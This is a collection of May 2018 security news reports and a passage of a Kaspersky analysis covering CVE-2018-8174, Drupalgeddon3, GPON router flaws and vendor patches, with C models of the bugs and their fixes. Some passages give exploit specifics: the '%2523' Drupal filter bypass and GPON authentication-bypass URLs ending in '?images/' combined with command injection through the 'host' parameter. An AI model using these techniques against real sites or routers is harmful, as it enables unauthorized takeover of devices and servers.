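    if (arrB1->destroyed) return 1;  /* ArrB(1) -> freed object      */

    release(arrB1);                  /* Erase ArrB: last reference   */
    return arrB1->destroyed ? 0 : -1;
}

int main(void)
{
    printf("vulnerable Release: %s\n",
           run_scenario(release_vulnerable) == 1 ? "ArrB(1) dangles (UAF)" : "ok");
    printf("fixed Release:      %s\n",
           run_scenario(release_fixed) == 0 ? "destroyed once, after last reference" : "unexpected");
    return 0;
}
```

The hardened variant is the general rule for any reference-counted object whose destructor can run script or other user callbacks: treat the count reaching zero as the start of teardown, not as proof that no new reference can appear, and decide about freeing only after the callback has returned.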

Conclusion
In this write up we analyzed the core reasons behind CVE-2018-8174, a particularly interesting Use-After-Free vulnerability that was possible due to incorrect object lifetime handling in the Class_Terminate VBScript method. The exploitation process is different from what we’ve seen in exploits for older vulnerabilities (CVE-2016-0189 and CVE-2014-6332) as the Godmode technique is no longer used. The full exploitation chain is as interesting as the vulnerability itself, but is out of scope of this article.

With CVE-2018-8174 being the first public exploit to use a URL moniker to load an IE exploit in Word, we believe that this technique, unless fixed, will be heavily abused by attackers in the future, as it allows them to force IE to load the page regardless of the default browser settings on a victim’s system.

We expect this vulnerability to become one of the most exploited in the near future, as it won’t be long until exploit kit authors start abusing it in both drive-by (via browser) and spear-phishing (via document) campaigns. To stay protected, we recommend applying the latest security updates and using a security solution with behavior detection capabilities.

In our opinion this is the same exploit which Qihoo360 Core Security Team called “Double Kill” in their recent publication. While this exploit is not limited to browser exploitation, it was reported as an IE zero day, which caused certain confusion in the security community.

After finding this exploit we immediately shared the relevant information with Microsoft and they confirmed that it is in fact CVE-2018-8174.

This exploit was found in the wild and was used by an APT actor. More information about that APT actor and usage of the exploit is available to customers of Kaspersky Intelligence Reporting Service. Contact: intelreports@kaspersky.com

Detection
Kaspersky Lab products successfully detect and block all stages of the exploitation chain and payload with the following verdicts:

HEUR:Exploit.MSOffice.Generic – RTF document
PDM:Exploit.Win32.Generic – IE exploit – detection with Automatic Exploit Prevention technology
HEUR:Exploit.Script.Generic – IE exploit
HEUR:Trojan.Win32.Generic – Payload
IOCs
b48ddad351dd16e4b24f3909c53c8901 – RTF document
15eafc24416cbf4cfe323e9c271e71e7 – Internet Explorer exploit (CVE-2018-8174)
1ce4a38b6ea440a6734f7c049f5c47e2 – Payload
autosoundcheckers[.]com


SAP Patches Internet Graphics Server Flaws
9.5.2018 securityweek  
Vulnerebility

SAP this week released its May 2018 set of security patches to address more than a dozen vulnerabilities across its product portfolio, including four bugs in Internet Graphics Server.

The company released 9 new Security Notes as part of the SAP Security Patch Day, to which Support Package Notes and updates to previously released notes are added, for a total of 16 notes released since the previous Patch Day (the second Tuesday of the previous month).

Most of the security bugs addressed this month were rated Medium severity, with just one assessed with a Low severity rating.

Missing authorization checks and Denial of service issues were the most commonly encountered vulnerabilities, but SAP also addressed Cross-Site Scripting, code injection, information disclosure, open redirect, XML external entity, implementation flaw, and spoofing bugs.

SAP Internet Graphics Server (IGS), the engine used by SAP for generating visual components like graphics or charts, was the most affected product this month, accounting for four of the Security Notes.

The vulnerabilities addressed in it include CVE-2018-2420 – Unrestricted File Upload (allowing an attacker to upload any file (including script files) without proper file format validation), CVE-2018-2421 and CVE-2018-2422 – Denial of Service, and CVE-2018-2423 – Denial of Service in IGS HTTP and RFC listener.

By exploiting CVE-2018-2420, an attacker could “gain access to user’s session and learn business-critical information, in some cases it is possible to get control over this information. In addition, XSS can be used for unauthorized modifying of displayed site content,” ERPScan reveals.

CVE-2018-2420 and CVE-2018-2421 are addressed in security notes #2615635 and #2616599, both expected to be discussed at an upcoming security conference in June.

SAP has addressed numerous vulnerabilities in IGS over the past months, including Denial of Service, Cross-Site Scripting (XSS), and Log Injection attacks, amongst others, Onapsis points out.

Two notes released in February (#2525222) and March (#2538829) together addressed more than 15 vulnerabilities, some of them very severe.

Another important vulnerability addressed this month is CVE-2018-2418, a Code Injection in SAP MaxDB ODBC Driver. The flaw allows an attacker to inject and run their own code, obtain additional sensitive information, modify or delete data, change the output of the system, create new users, control the behavior of the system, or escalate privileges and perform a DoS attack.

This month, SAP also re-released security note #2190621 (initially published two and a half years ago) with updated CVSS, prerequisite and solution information related to incorrect logging of IP addresses in the Security Audit Logging (SAL) function.

In some environments where the SAP system is behind a proxy or a NAT, the original client IP address is logged instead of the NAT-translated IP address. Not only can client IP addresses be easily manipulated, but the upcoming General Data Protection Regulation (GDPR) could consider client IP addresses as personal data, Onapsis notes.

A couple of weeks ago, Onapsis revealed that 9 out of 10 SAP systems were found to be vulnerable to a SAP Netweaver bug that was first identified in 2005. The vulnerability provides an attacker with unrestricted access to the system, allowing them to read information, extract data, or shut the system down.

“The threat still exists within the default security settings of every Netweaver based SAP product such as SAP ERP, SAP CRM, S/4 HANA, SAP GRC Process and Access Control, SAP Process Integration/Exchange Infrastructure (PI/XI), SAP Solution Manager, SAP SCM, SAP SRM and others,” the firm explains.


Misinterpretation of Intel Docs Leads to Flaw in Hypervisors, OSs
9.5.2018 securityweek
Vulnerebility

The developers of several major operating systems and hypervisors misinterpreted documentation from Intel and introduced a potentially serious vulnerability to their products.

According to an advisory published on Tuesday by CERT/CC, the flaw impacts the Linux kernel and software made by Apple, the DragonFly BSD Project, Red Hat, the FreeBSD Project, Microsoft, SUSE Linux, Canonical, VMware, and the Xen Project. CERT/CC also provides a long list of other companies whose products may be affected.

The vulnerability, tracked as CVE-2018-8897, exists due to the way operating systems and hypervisors handle MOV/POP to SS instructions. Exploitation requires local access to the targeted system.

Impact varies depending on the affected software. In the case of Linux, it can lead to a crash of the kernel and a denial-of-service (DoS) condition. Microsoft says an attacker can exploit the security hole on Windows for privilege escalation. The Xen Project says a malicious PV guest can escalate privileges to the ones of the hypervisor, while CERT/CC warns that an attacker can “read sensitive data in memory or control low-level operating system functions.”

Patches have been released for the Linux kernel, Windows, Xen and various Linux distributions, but in most cases the issue has been classified only as “moderate” or “important.” Proof-of-concept (PoC) exploits have been created for both Windows and Linux.

The researchers who discovered the vulnerability, Nick Peterson of Everdox Tech and Nemanja Mulasmajic of triplefault.io, say it impacts both Intel and AMD hardware. A paper published by the experts provides technical details.

According to CERT/CC, the problem appears to exist due to developers misinterpreting existing documentation.

“The MOV SS and POP SS instructions inhibit interrupts (including NMIs), data breakpoints, and single step trap exceptions until the instruction boundary following the next instruction,” CERT/CC wrote in its advisory.

“If the instruction following the MOV to SS or POP to SS instruction is an instruction like SYSCALL, SYSENTER, INT 3, etc. that transfers control to the operating system at Current Privilege Level (CPL) < 3, a debug exception is delivered after the transfer to CPL < 3 is complete. Such deferred #DB exceptions by MOV SS and POP SS may result in unexpected behavior.

“Therefore, in certain circumstances after the use of certain Intel x86-64 architecture instructions, a debug exception pointing to data in a lower ring (for most operating systems, the kernel Ring 0 level) is made available to operating system components running in Ring 3. This may allow an attacker to utilize operating system APIs to gain access to sensitive memory information or control low-level operating system functions,” CERT/CC added.


Third Critical Drupal Flaw Discovered—Patch Your Sites Immediately
9.5.2018 thehackernews 
Vulnerebility
Damn! You have to update your Drupal websites.
Yes, of course, once again—literally it’s the third time in the last 30 days.
As notified in advance two days back, Drupal has now released new versions of its software to patch yet another critical remote code execution (RCE) vulnerability, affecting its Drupal 7 and 8 core.
Drupal is a popular open-source content management system that powers millions of websites, and unfortunately, the CMS has been under active attack since the disclosure of a highly critical remote code execution vulnerability.
The new vulnerability was discovered while exploring the previously disclosed RCE vulnerability, dubbed Drupalgeddon2 (CVE-2018-7600) that was patched on March 28, forcing the Drupal team to release this follow-up patch update.
According to a new advisory released by the team, the new remote code execution vulnerability (CVE-2018-7602) could also allow attackers to take over vulnerable websites completely.
How to Patch Drupal Vulnerability

Since the previously disclosed flaw drew much attention and motivated attackers to target websites running on Drupal, the company has urged all website administrators to install the new security patches as soon as possible.
If you are running 7.x, upgrade to Drupal 7.59.
If you are running 8.5.x, upgrade to Drupal 8.5.3.
If you are running 8.4.x, which is no longer supported, you need first to update your site to 8.4.8 release and then install the latest 8.5.3 release as soon as possible.
It should also be noted that the new patches will only work if your site has already applied the patches for the Drupalgeddon2 flaw.
"We are not aware of any active exploits in the wild for the new vulnerability," a Drupal spokesperson told The Hacker News. "Moreover, the new flaw is more complex to string together into an exploit."
Technical details of the flaw, which can be called Drupalgeddon3, have not been released in the advisory, but that does not mean you can wait until the next morning to update your website, believing it won't be attacked.
We have seen how attackers developed automated exploits leveraging the Drupalgeddon2 vulnerability to inject cryptocurrency miners, backdoors, and other malware into websites within a few hours after its details went public.
Besides these two flaws, the team also patched a moderately critical cross-site scripting (XSS) vulnerability last week, which could have allowed remote attackers to pull off advanced attacks including cookie theft, keylogging, phishing and identity theft.
Therefore, Drupal website admins are highly recommended to update their websites as soon as possible.


Release of PoC Exploit for New Drupal Flaw Once Again Puts Sites Under Attack
9.5.2018 thehackernews 
Vulnerebility

Only a few hours after the Drupal team released the latest updates to fix a new remote code execution flaw in its content management system software, hackers had already started exploiting the vulnerability in the wild.
Announced yesterday, the newly discovered vulnerability (CVE-2018-7602) affects Drupal 7 and 8 core and allows remote attackers to achieve exactly what the previously discovered Drupalgeddon2 (CVE-2018-7600) flaw allowed: complete takeover of affected websites.
Although the Drupal team has not released any technical details of the vulnerability to prevent immediate exploitation, two individual hackers have revealed some details, along with a proof-of-concept exploit, just a few hours after the patch release.
If you have been actively reading every latest story on The Hacker News, you must be aware of how the release of the Drupalgeddon2 PoC exploit drew much attention, which eventually allowed attackers to actively hijack websites and spread cryptocurrency miners, backdoors, and other malware.
As expected, the Drupal team has warned that the new remote code execution flaw, let's refer to it as Drupalgeddon3, is now actively being exploited in the wild, again leaving millions of websites vulnerable to hackers.
In this article, I have briefed what this new flaw is all about and how attackers have been exploiting it to hack websites running unpatched versions of Drupal.

The exploitation process of Drupalgeddon3 flaw is somewhat similar to Drupalgeddon2, except it requires a slightly different payload to trick vulnerable websites into executing the malicious payload on the victim's server.
Drupalgeddon3 exists due to improper input validation in the Form API, also known as "renderable arrays," which renders metadata to output the structure of most of the UI (user interface) elements in Drupal. These renderable arrays are a key-value structure in which the property keys start with a hash sign (#).
A Twitter user with the handle @_dreadlocked explains that the flaw in the Form API can be triggered through the "destination" GET parameter of a URL that loads when a registered user initiates a request to delete a node, where a "node" is any piece of individual content, such as a page, article, forum topic, or post.
Since this "destination" GET query parameter also accepts another URL (as a value) with its own GET parameters, whose values were not sanitized, it allowed an authenticated attacker to trick websites into executing code.
What I have understood from the PoC exploit released by another Twitter user, using the handle @Blaklis_, is that the unsanitized values pass through the stripDangerousValues() function, which filters the "#" character and can be abused by encoding the "#" character as "%2523".
The function decodes "%2523" into "%23," which is the Unicode version for "#" and will be processed to run arbitrary code on the system, such as a whoami utility.
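The decode-then-filter ordering described above, as an added example that is not Drupal’s code and does not reproduce its stripDangerousValues() implementation: a C model in which classify_key_vulnerable, classify_key_fixed, percent_decode_once and the KEY_* outcomes are hypothetical names. "%25" is the percent-encoded form of "%" and "%23" the percent-encoded form of "#", so "%2523" survives one decoding pass as "%23" and only becomes "#" on a second pass. The vulnerable order decodes once, checks for "#", and then lets a nested URL parse decode again; the hardened order decodes to a fixed point first (with a bound, rejecting input that is still changing) and applies the check to the canonical form, so no later decode can turn an accepted key into a "#" property. The sample keys are constructed.

```c
#include <stdio.h>
#include <string.h>

/*
 * Constructed model of the double-encoding bypass. The KEY_* outcomes and the
 * classify_* functions are hypothetical; they model the order of decoding and
 * filtering, not Drupal's real stripDangerousValues().
 */
enum { KEY_REJECTED = 0, KEY_PLAIN = 1, KEY_PROPERTY = 2 };
#define KEYCAP 256

static int hexval(int c)
{
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}

/* One pass of percent-decoding; malformed escapes are copied through unchanged. */
static void percent_decode_once(const char *src, char *dst, size_t cap)
{
    size_t o = 0;
    for (size_t i = 0; src[i] != '\0' && o + 1 < cap; i++) {
        int hi, lo;
        if (src[i] == '%' && (hi = hexval((unsigned char)src[i + 1])) >= 0
                          && (lo = hexval((unsigned char)src[i + 2])) >= 0) {
            dst[o++] = (char)(hi * 16 + lo);
            i += 2;
        } else {
            dst[o++] = src[i];
        }
    }
    dst[o] = '\0';
}

/* Vulnerable order: decode once, filter '#', then the inner "destination" URL
 * is parsed (decoded again) before the key is used as a render property. */
int classify_key_vulnerable(const char *raw)
{
    char once[KEYCAP], twice[KEYCAP];
    percent_decode_once(raw, once, sizeof once);
    if (once[0] == '#') return KEY_REJECTED;          /* sees '%' for "%2523"     */
    percent_decode_once(once, twice, sizeof twice);   /* nested parse: "%23" -> '#' */
    return twice[0] == '#' ? KEY_PROPERTY : KEY_PLAIN;
}

/* Hardened order: decode to a fixed point (bounded), reject input that is still
 * changing, and filter the canonical form. Anything accepted here is already
 * fully decoded, so a later decode cannot change it. */
int classify_key_fixed(const char *raw)
{
    char cur[KEYCAP], next[KEYCAP];
    int stable = 0;
    strncpy(cur, raw, sizeof cur - 1);
    cur[sizeof cur - 1] = '\0';
    for (int pass = 0; pass < 4; pass++) {
        percent_decode_once(cur, next, sizeof next);
        if (strcmp(cur, next) == 0) { stable = 1; break; }
        memcpy(cur, next, sizeof cur);
    }
    if (!stable) return KEY_REJECTED;       /* nested deeper than any legitimate use */
    if (cur[0] == '#') return KEY_REJECTED; /* dangerous key in canonical form       */
    return KEY_PLAIN;
}

int main(void)
{
    /* Constructed sample keys; "#example" stands for any '#'-prefixed property. */
    const char *samples[] = { "title", "%23example", "%2523example", "a%2520b" };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%-16s vulnerable=%d fixed=%d\n", samples[i],
               classify_key_vulnerable(samples[i]), classify_key_fixed(samples[i]));
    return 0;
}
```

The general lesson is that a filter is only meaningful at the representation the consumer actually uses: either canonicalize fully before checking, as classify_key_fixed does, or enforce the check at the point where the decoded key is about to be interpreted.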
At first, Drupal developers were skeptical about the possibility of real attacks using the Drupalgeddon3 vulnerability, but after the reports of in-the-wild attacks emerged, Drupal raised the level of danger of the problem to "Highly critical."
Therefore, all Drupal website administrators are highly recommended to update their websites to the latest versions of the software as soon as possible.


Faulty Patch for Oracle WebLogic Flaw Opens Updated Servers to Hackers Again
9.5.2018 thehackernews 
Vulnerebility

Earlier this month, Oracle patched a highly critical Java deserialization remote code execution vulnerability in its WebLogic Server component of Fusion Middleware that could allow attackers to easily gain complete control of a vulnerable server.
However, a security researcher, who operates through the Twitter handle @pyn3rd and claims to be part of the Alibaba security team, has now found a way using which attackers can bypass the security patch and exploit the WebLogic vulnerability once again.
WebLogic Server acts as a middle layer between the front end user interface and the backend database of a multi-tier enterprise application. It provides a complete set of services for all components and handles details of the application behavior automatically.
Initially discovered in November last year by Liao Xinxi of NSFOCUS security team, the Oracle WebLogic Server flaw (CVE-2018-2628) can be exploited with network access over TCP port 7001.

If exploited successfully, the flaw could allow a remote attacker to completely take over a vulnerable Oracle WebLogic Server. The vulnerability affects versions 10.3.6.0, 12.1.3.0, 12.2.1.2 and 12.2.1.3.
Since a proof-of-concept (PoC) exploit for the original Oracle WebLogic Server vulnerability has already been made public on Github and someone has just bypassed the patch as well, your up-to-date services are again at risk of being hacked.
Although @pyn3rd has only released a short GIF (video) as a proof-of-concept (PoC) instead of releasing full bypass code or any technical details, it would hardly take more than a few hours or days for skilled hackers to figure out a way to achieve the same.
Currently, it is unclear when Oracle would release a new security update to address this issue that has re-opened CVE-2018-2628 flaw.
In order to be at least one step safer, it is still advisable to install the April patch update released by Oracle if you haven't yet, because attackers have already started scanning the Internet for vulnerable WebLogic servers.


Adobe fixed a Critical Code Execution issue in Flash Player
9.5.2018 securityaffairs
Vulnerebility

Adobe has released security updates to address several vulnerabilities in its products, including Flash Player, Creative Cloud and Connect.
The security updates also address a critical code execution vulnerability in Flash Player tracked as CVE-2018-4944. The flaw is a critical type confusion that could be exploited to execute arbitrary code; the good news is that Adobe has given it a priority rating of “2” because the company does not consider the development of exploit code imminent.

The vulnerability affects Flash Player 29.0.0.140 and earlier versions and was addressed with the release of version 29.0.0.171 for Windows, Mac, Linux and Chrome OS.

The flaw is a critical type confusion that allows arbitrary code execution (CVE-2018-4944), but Adobe has assigned it a severity rating of “2,” which indicates that exploits are not considered imminent and there is no rush to install the update.

“Adobe has released security updates for Adobe Flash Player for Windows, Macintosh, Linux and Chrome OS. These updates address critical vulnerabilities in Adobe Flash Player 29.0.0.140 and earlier versions. Successful exploitation could lead to arbitrary code execution in the context of the current user.” reads the advisory published by Adobe.

Adobe also addressed three security vulnerabilities in the Creative Cloud desktop applications for Windows and macOS, the issues affect version 4.4.1.298 and earlier of the apps.

“Adobe has released a security update for the Creative Cloud Desktop Application for Windows and MacOS.” reads the advisory.

“This update resolves a vulnerability in the validation of certificates used by Creative Cloud desktop applications (CVE-2018-4991), and an improper input validation vulnerability (CVE-2018-4992) that could lead to privilege escalation.”

The flaws affecting the Creative Cloud desktop applications are:

an improper input validation that can be exploited to escalate privilege (critical);
an improper certificate validation problem that can lead to a security bypass (important);
an unquoted search path that can be exploited for privilege escalation (important);
All of the vulnerabilities received a priority rating of “2.”

Adobe also addressed an authentication bypass vulnerability affecting Connect versions 9.7.5 and earlier. The flaw, rated as “important”, could lead to the exposure of sensitive information.

“An important authentication bypass vulnerability (CVE-2018-4994) exists in Adobe Connect versions 9.7.5 and earlier. Successful exploitation of this vulnerability could result in sensitive information disclosure.” reads the advisory.


May 2018 Patch Tuesday: Microsoft fixes 2 zero-day flaws reportedly exploited by APT group
9.5.2018 securityaffairs
Vulnerebility

Microsoft has released the May 2018 Patch Tuesday that addresses more than 60 vulnerabilities, including two Windows zero-day flaws that can be exploited for remote code execution and privilege escalation.
Microsoft May 2018 Patch Tuesday includes security patches for 67 vulnerabilities, including two zero-days that have already been exploited in the wild by threat actors.

The security updates address 21 vulnerabilities that are rated as critical, 42 rated important, and 4 rated as low severity. The flaws affect many products, including Microsoft Windows, Internet Explorer, Microsoft Edge, Outlook, Microsoft Office, Microsoft Office Exchange Server, .NET Framework, Microsoft Hyper-V, ChakraCore, Azure IoT SDK, and others.

The most severe issue is the CVE-2018-8174 zero-day, dubbed Double Kill, a critical vulnerability that could be exploited by remote attackers to execute arbitrary code on all supported versions of Windows.

The vulnerability was first reported by experts at Qihoo 360; according to them, it was exploited by a known advanced persistent threat (APT) group in targeted attacks that went through Internet Explorer and leveraged specially crafted, weaponized Office documents.

The Double Kill vulnerability is a use-after-free issue that resides in the way the VBScript engine handles objects in memory. An attacker can exploit the flaw to execute code that runs with the same privileges as the logged-in user.

“A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.” reads the advisory published by Microsoft. “If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.”

Security experts from Kaspersky confirmed that the CVE-2018-8174 flaw was exploited in targeted attacks by an APT group: the hackers delivered weaponized documents that downloaded a second-stage payload. Victims were tricked into visiting a malicious HTML page containing the code that triggers the UAF and a shellcode that downloads the malicious payload.

“In a web-based attack scenario, an attacker could host a specially crafted website that is designed to exploit the vulnerability through Internet Explorer and then convince a user to view the website. An attacker could also embed an ActiveX control marked ‘safe for initialization’ in an application or Microsoft Office document that hosts the IE rendering engine,” Microsoft explains in its advisory.

“The attacker could also take advantage of compromised websites and websites that accept or host user-provided content or advertisements. These websites could contain specially crafted content that could exploit the vulnerability.”

The Microsoft May 2018 Patch Tuesday also addresses another zero-day vulnerability, tracked as CVE-2018-8120, a privilege escalation related to the way the Win32k component handles objects in memory. The flaw could be exploited by an authenticated attacker to execute arbitrary code in kernel mode.

“An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.” reads the advisory.

“To exploit this vulnerability, an attacker would first have to log on to the system. An attacker could then run a specially crafted application that could exploit the vulnerability and take control of an affected system.”

The CVE-2018-8120 flaw only affects Windows 7 and Windows Server 2008.

Microsoft May 2018 Patch Tuesday

The Microsoft May 2018 Patch Tuesday also fixed two Windows vulnerabilities rated as “important” whose details have been made public. The flaws are respectively a privilege escalation issue (CVE-2018-8170) and an information disclosure (CVE-2018-8141).


Lenovo Patches Secure Boot Vulnerability in Servers
9.5.2018 securityweek
Vulnerebility

Lenovo has released patches for a High severity vulnerability impacting the Secure Boot function on some System x servers.

Exploitation of this security vulnerability could result in unauthenticated code being booted. Discovered by the computer maker’s internal testing team and tracked as CVE-2017-3775, the issue impacts a dozen models, including Flex System x240 M5, x280 X6, x480 X6, x880, x3xxx series, and NeXtScale nx360 M5 devices.

“Lenovo internal testing discovered some System x server BIOS/UEFI versions that, when Secure Boot mode is enabled by a system administrator, do not properly authenticate signed code before booting it. As a result, an attacker with physical access to the system could boot unsigned code,” the manufacturer notes.

These systems ship with Secure Boot disabled by default, because signed code is relatively new in the data center environment, the company says, adding that standard operator configurations disable signature checking.

In its advisory, the computer maker published not only the complete list of affected models, but also links to the appropriate BIOS/UEFI update for each model. The company advises admins relying on Secure Boot to control physical access to systems prior to applying the updates.

Lenovo also released a patch for a buffer overflow in Lenovo System Update Drive Mapping Utility. Tracked as CVE-2018-9063, the vulnerability could result in undefined behaviors, such as execution of arbitrary code, the company notes.

Discovered by SaifAllah benMassaoud and assessed with a Medium severity rating, the vulnerability can be exploited by an attacker entering a very large user ID or password in order to overrun the program’s buffer. An attacker could potentially execute code with MapDrv’s privileges.

Lenovo System Update version 5.07.0072 or later addresses the vulnerability and users are advised to update the application to remain protected. To determine the currently installed version of Lenovo System Update, users should launch the application, click the green question mark in the top right corner and then select “About.”

Lenovo System Update automatically checks for a newer version when executed, so users should simply launch the application and accept the update when prompted. Manual updates are also possible by downloading the latest app version from Lenovo’s site.


Critical Code Execution Flaw Patched in Flash Player
9.5.2018 securityweek
Vulnerebility

Adobe has patched several vulnerabilities in its Flash Player, Creative Cloud and Connect products, but the company believes it’s unlikely that the flaws will be exploited in the wild any time soon.

Only one vulnerability has been patched in Flash Player with the release of version 29.0.0.171 for Windows, Mac, Linux and Chrome OS. The issue, reported to Adobe by Jihui Lu of Tencent KeenLab, impacts Flash Player 29.0.0.140 and earlier versions.

The flaw is a critical type confusion that allows arbitrary code execution (CVE-2018-4944), but Adobe has assigned it a severity rating of “2,” which indicates that exploits are not considered imminent and there is no rush to install the update.

A total of three security holes have been patched by Adobe in the Creative Cloud desktop applications for Windows and macOS. Researchers discovered that version 4.4.1.298 and earlier of the apps are impacted by an improper input validation issue that can lead to privilege escalation, an improper certificate validation problem that can lead to a security bypass, and a flaw described as an “unquoted search path” that can be exploited for privilege escalation.

The certificate validation vulnerability has been classified “critical,” while the other two issues have been rated “important.” All of them have a priority rating of “2.”

Wei Wei of Tencent's Xuanwu Lab, Ryan Hileman of Talon Voice, Chi Chou, and Cyril Vallicari of HTTPCS – Ziwit have been credited for finding the flaws.

Finally, Adobe patched an “important” authentication bypass vulnerability affecting Connect versions 9.7.5 and earlier. Exploitation of the flaw can result in the exposure of sensitive information.


Microsoft Patches Two Windows Zero-Day Vulnerabilities
9.5.2018 securityweek
Vulnerebility

Microsoft has fixed more than 60 vulnerabilities with its May 2018 Patch Tuesday updates, including two Windows zero-day flaws that can be exploited for remote code execution and privilege escalation.

The more serious of the zero-day vulnerabilities is CVE-2018-8174, a critical issue that allows attackers to remotely execute arbitrary code on all supported versions of Windows.

The existence of the flaw was revealed last month by Chinese security firm Qihoo 360, which reported that a known advanced persistent threat (APT) actor had been exploiting the vulnerability via Internet Explorer and specially crafted Office documents.

Microsoft has credited Qihoo 360 and Kaspersky Lab for reporting this vulnerability. Both companies say the flaw has been exploited in targeted attacks, but no information is currently available on the threat group.

According to Microsoft, the security hole exists due to the way the VBScript engine handles objects in memory. The weakness can be exploited through Internet Explorer by getting the targeted user to visit a malicious website (including via malvertising) or by embedding an ActiveX control marked “safe for initialization” in an application or an Office document that hosts the Internet Explorer rendering engine.

Kaspersky has described it as a use-after-free (UAF) bug. In the attacks observed by the company, the attackers delivered malicious documents set up to download a second-stage payload, specifically a malicious HTML page. The code in this web page triggers the UAF and a shellcode that downloads a malicious payload is executed.

“This technique, until fixed, allowed criminals to force Internet Explorer to load, no matter which browser one normally used – further increasing an already huge attack surface,” explained Anton Ivanov, the Kaspersky Lab researcher credited by Microsoft for reporting this flaw. “Fortunately, proactive discovery of the threat has led to the timely release of the security patch by Microsoft. We urge organizations and private users to install recent patches immediately, as it won't be long before exploits to this vulnerability make it to popular exploit kits and will be used not only by sophisticated threat actors, but also by standard cybercriminals.”

Trend Micro’s Zero Day Initiative (ZDI) pointed out that CVE-2018-8174 is very similar to CVE-2018-1004, a vulnerability patched by Microsoft in April after it was reported to the company via ZDI.

The second zero-day vulnerability patched on Tuesday by Microsoft is CVE-2018-8120, a privilege escalation weakness in Windows. The flaw, related to how the Win32k component handles objects in memory, allows an attacker to execute arbitrary code in kernel mode, but exploitation requires authentication.

Microsoft says the vulnerability only affects Windows 7 and Windows Server 2008 – newer versions of the operating system do not appear to be impacted. An ESET researcher has been credited for reporting this flaw to Microsoft, but the antivirus firm has yet to share any details about the attacks involving CVE-2018-8120.

The May 2018 updates also resolve two Windows vulnerabilities whose details have been made public. The flaws have been rated “important” and they can lead to privilege escalation (CVE-2018-8170) and information disclosure (CVE-2018-8141).

Nearly 20 other issues addressed this month have been rated “critical.” They include memory corruptions in the Edge and Internet Explorer scripting engines and remote code execution flaws in Hyper-V.

Adobe has also released Patch Tuesday updates, but it has only addressed five security bugs in Flash Player, Creative Cloud and Connect.


Unofficial Patch Released for Zero-Days Affecting Dasan Routers
8.5.2018 securityweek
Vulnerebility

An unofficial patch has been released for the zero-day vulnerabilities affecting a large number of routers made by South Korea-based Dasan Networks.

vpnMentor last week disclosed the details of two vulnerabilities impacting Gigabit-capable Passive Optical Network (GPON) routers made by Dasan. The affected devices are typically provided by ISPs that offer fiber-optic Internet.

There are roughly one million of these GPON home routers exposed to the Internet, a majority located in Mexico, Kazakhstan, and Vietnam.

One of the flaws discovered by vpnMentor (CVE-2018-10561) allows a remote attacker to bypass a router’s authentication mechanism, while the second vulnerability (CVE-2018-10562) can be exploited by an authenticated attacker to inject arbitrary commands. The security holes can be combined to take complete control of vulnerable devices.

Shortly after the vulnerabilities were disclosed, researchers started seeing attempts to exploit the flaws. Chinese security firm Qihoo 360 has observed three campaigns, including ones involving the Mirai and Muhstik botnets. It’s worth noting that the Muhstik botnet was recently spotted exploiting a critical Drupal vulnerability dubbed Drupalgeddon2.

Since it might take a while until Dasan releases an official firmware update for its products, vpnMentor has decided to create its own patch.

Users simply have to enter their router’s local IP address and click the “Run Patch” button. The tool runs a script in the browser that disables the web server so that attackers can no longer gain access to it.

Since this is not an official patch, vpnMentor does not offer any guarantees and the company warns that re-enabling the web server is not an easy process. It does highlight the fact that none of the data entered by users is stored on its systems, which can be verified in the tool’s source code.

The tool and usage instructions are available on vpnMentor’s website.

Routers made by Dasan have been known to be targeted by botnets. Researchers revealed in February that the Satori botnet had ensnared thousands of devices by exploiting a remote code execution vulnerability disclosed in December 2017 by Beyond Security, which claimed the vendor had ignored repeated attempts to report the issue.

UPDATE. Dasan has provided the following statement to SecurityWeek:

DASAN Zhone Solutions, Inc. has investigated recent media reports that certain DZS GPON Network Interface Devices (NIDs), more commonly known as routers, could be vulnerable to an authentication bypass exploit.

DZS has determined that the ZNID-GPON-25xx series and certain H640-series GPON ONTs, when operating on specific software releases, are affected by this vulnerability. No service impacts from this vulnerability have been reported to DZS to date. After an internal investigation, we have determined the potential impact is much more limited in scope than previously reported in the media. According to DZS sales records, combined with field data gathered to date, we have estimated that the number of GPON ONT units that may be potentially impacted to be less than 240,000. In addition, given the relative maturity of the products in their lifecycle, we think the impact is limited to even fewer devices.

Product History

The DZS ZNID-GPON-25xx and certain H640-series ONTs, including the software that introduced this vulnerability, were developed by an OEM supplier and resold by DZS. While designed and released more than 9 years ago, most of these products are now well past their sustainable service life. Because software support contracts are no longer offered for most of these products, we do not have direct insight to the total number of units that are still actively used in the field.

Resolution

DZS has informed all the customers who purchased these models of the vulnerability. We are working with each customer to help them assess methods to address the issue for units that may still be installed in the field. It will be up to the discretion of each customer to decide how to address the condition for their deployed equipment.


UPDATED – Critical RCE vulnerability found in over a million GPON Home Routers
8.5.2018 securityaffairs
Vulnerebility

Security researchers at VPNMentor conducted a comprehensive assessment of a number of GPON home routers and discovered a critical remote code execution vulnerability that could be exploited to gain full control over them.
The researchers found a way to bypass authentication on the GPON home routers (CVE-2018-10561). The experts chained this authentication bypass with a command injection vulnerability (CVE-2018-10562) and were able to execute commands on the device.

GPON Home Routers hack

Exploitation:
Analyzing the firmware of the GPON home routers, the experts found two different critical vulnerabilities (CVE-2018-10561 & CVE-2018-10562) that could be chained to allow complete control of the vulnerable device and therefore of the network. The first vulnerability lies in the authentication mechanism of the device and could be exploited by an attacker to bypass all authentication.

The vulnerability affects the built-in HTTP server, which checks for specific paths when authenticating. This allows the attacker to bypass authentication on any endpoint using a simple trick.

By appending ?images/ to the URL, the attacker can bypass authentication on the endpoint. This works on both HTML pages and GponForm/ endpoints.

For instance, by requesting /menu.html?images/ or /GponForm/diag_FORM?images/ the experts were able to control the GPON Home Routers.

While looking through the device functionalities, the experts noticed the diagnostic endpoint contained the ping and traceroute commands. It didn’t take much to figure out that the commands can be injected using the host parameter.

